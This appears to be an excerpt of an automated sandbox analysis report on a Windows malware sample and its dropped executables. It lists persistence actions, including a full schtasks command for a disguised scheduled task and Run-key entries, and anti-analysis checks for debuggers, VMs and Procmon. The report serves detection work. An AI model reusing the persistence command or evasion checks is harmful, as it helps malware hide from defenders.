Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File created: C:\Program Files\Windows Media Player\graph\graph.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Window searched: window name: Regmonclass
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: PROCMON.EXE
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: X64DBG.EXE
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: WINDBG.EXE
Source: 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F97F60 second address: F97F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F97F66 second address: F97F87 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFB34E3B6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FFB34E3B6CEh 0x00000010 js 00007FFB34E3B6C6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 jne 00007FFB34E3B6C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F977DB second address: F977EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FFB34C126BAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
